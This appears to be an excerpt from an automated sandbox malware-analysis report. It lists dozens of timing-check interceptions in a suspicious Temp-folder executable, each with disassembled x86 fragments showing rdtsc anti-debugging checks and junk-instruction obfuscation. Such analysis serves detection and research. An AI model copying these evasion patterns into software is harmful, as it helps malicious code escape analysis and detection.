                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 50676F second address: 506779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 506779 second address: 50677D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 50677D second address: 506799 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52DB81 second address: 52DB88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52E112 second address: 52E11A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52E11A second address: 52E11E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52E11E second address: 52E122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52E2BC second address: 52E2C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52E2C1 second address: 52E2C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52E2C7 second address: 52E2D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F29F0C52756h 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52E594 second address: 52E5A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnp 00007F29F0CD5296h 0x0000000c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52E6EA second address: 52E6F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52E6F0 second address: 52E6F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52EA42 second address: 52EA4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F29F0C52756h 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52EA4C second address: 52EA78 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F29F0CD5296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b jne 00007F29F0CD52BCh 0x00000011 jmp 00007F29F0CD52A8h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52EA78 second address: 52EA7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52EBB0 second address: 52EBCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F29F0CD52A6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52EBCE second address: 52EBD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52ED5E second address: 52ED76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0CD52A4h 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52ED76 second address: 52ED82 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52ED82 second address: 52ED8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52ED8E second address: 52ED98 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F29F0C52756h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52EECE second address: 52EED2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52F46E second address: 52F474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52F5C8 second address: 52F5DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F29F0CD5296h 0x0000000d jc 00007F29F0CD5296h 0x00000013 popad 0x00000014 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52F5DC second address: 52F5E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F29F0C52756h 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52F73D second address: 52F752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jne 00007F29F0CD5296h 0x00000014 popad 0x00000015 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52F752 second address: 52F771 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52764h 0x00000007 pushad 0x00000008 jnc 00007F29F0C52756h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52F771 second address: 52F777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 52F89D second address: 52F8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 532416 second address: 532423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 532423 second address: 532427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 532427 second address: 53242D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53242D second address: 532437 instructions: 0x00000000 rdtsc 0x00000002 js 00007F29F0C5275Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 532437 second address: 53244E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F29F0CD529Fh 0x0000000d rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53C1BC second address: 53C1CE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F29F0C5275Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53C1CE second address: 53C1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53C1D2 second address: 53C1F2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F29F0C52756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F29F0C52762h 0x00000014 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53C1F2 second address: 53C1F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53C355 second address: 53C36D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52764h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53C36D second address: 53C376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53C8C3 second address: 53C8D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0C5275Ch 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53C8D3 second address: 53C8D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53C8D7 second address: 53C8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53C8DD second address: 53C905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F29F0CD529Ch 0x0000000c jnc 00007F29F0CD5296h 0x00000012 jmp 00007F29F0CD52A2h 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53D8EC second address: 53D909 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C5275Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pushad 0x0000000c jno 00007F29F0C52758h 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53D909 second address: 53D90D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53D90D second address: 53D942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c pushad 0x0000000d jp 00007F29F0C52756h 0x00000013 jl 00007F29F0C52756h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F29F0C52769h 0x00000021 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53D942 second address: 53D972 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD529Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c jo 00007F29F0CD529Eh 0x00000012 push ebx 0x00000013 jno 00007F29F0CD5296h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push ebx 0x0000001f pushad 0x00000020 jnp 00007F29F0CD5296h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53D972 second address: 53D9B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F29F0C52758h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 movsx edi, si 0x00000024 push AE00AB7Bh 0x00000029 push eax 0x0000002a push edx 0x0000002b jnl 00007F29F0C5275Ch 0x00000031 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53E89F second address: 53E8A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53E8A4 second address: 53E8A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53E8A9 second address: 53E8AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53E9EE second address: 53E9F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53EAA3 second address: 53EAA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53EF94 second address: 53EF99 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53EF99 second address: 53EFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 pushad 0x00000009 mov edi, dword ptr [ebp+122D2A7Fh] 0x0000000f mov dword ptr [ebp+122D2685h], edi 0x00000015 popad 0x00000016 push 00000000h 0x00000018 jmp 00007F29F0CD529Ah 0x0000001d push 00000000h 0x0000001f call 00007F29F0CD529Ch 0x00000024 xor di, B8DBh 0x00000029 pop esi 0x0000002a xchg eax, ebx 0x0000002b pushad 0x0000002c pushad 0x0000002d push edi 0x0000002e pop edi 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53EFD6 second address: 53EFDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53EFDE second address: 53EFFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F29F0CD5296h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f jmp 00007F29F0CD529Ch 0x00000014 pop edi 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53F932 second address: 53F937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53F7D3 second address: 53F7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53F937 second address: 53F9AA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F29F0C5275Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F29F0C52760h 0x00000010 nop 0x00000011 mov esi, dword ptr [ebp+122D2B57h] 0x00000017 push 00000000h 0x00000019 mov di, 11BEh 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007F29F0C52758h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 00000017h 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 or edi, dword ptr [ebp+122D2ACFh] 0x0000003f xchg eax, ebx 0x00000040 jmp 00007F29F0C52767h 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53F7D8 second address: 53F7DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 53F9AA second address: 53F9AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 540A1D second address: 540A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 540A22 second address: 540A27 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 542B13 second address: 542B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 sub dword ptr [ebp+122D231Eh], esi 0x0000000c push 00000000h 0x0000000e pushad 0x0000000f call 00007F29F0CD52A6h 0x00000014 jmp 00007F29F0CD529Fh 0x00000019 pop ecx 0x0000001a xor cx, 78A4h 0x0000001f popad 0x00000020 push 00000000h 0x00000022 xor esi, dword ptr [ebp+122D2C47h] 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b push esi 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 542B5C second address: 542B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 542B61 second address: 542B73 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F29F0CD5296h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 541CF2 second address: 541CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 544021 second address: 544025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 544025 second address: 544040 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F29F0C5275Bh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5494C5 second address: 5494D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29F0CD52A0h 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5494D9 second address: 5494DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 548566 second address: 54856A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 54856A second address: 5485DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push dword ptr fs:[00000000h] 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F29F0C52758h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f mov edi, dword ptr [ebp+122D2662h] 0x00000035 mov eax, dword ptr [ebp+122D0989h] 0x0000003b push 00000000h 0x0000003d push ebx 0x0000003e call 00007F29F0C52758h 0x00000043 pop ebx 0x00000044 mov dword ptr [esp+04h], ebx 0x00000048 add dword ptr [esp+04h], 00000014h 0x00000050 inc ebx 0x00000051 push ebx 0x00000052 ret 0x00000053 pop ebx 0x00000054 ret 0x00000055 and bx, BCF2h 0x0000005a push FFFFFFFFh 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 pushad 0x00000061 popad 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
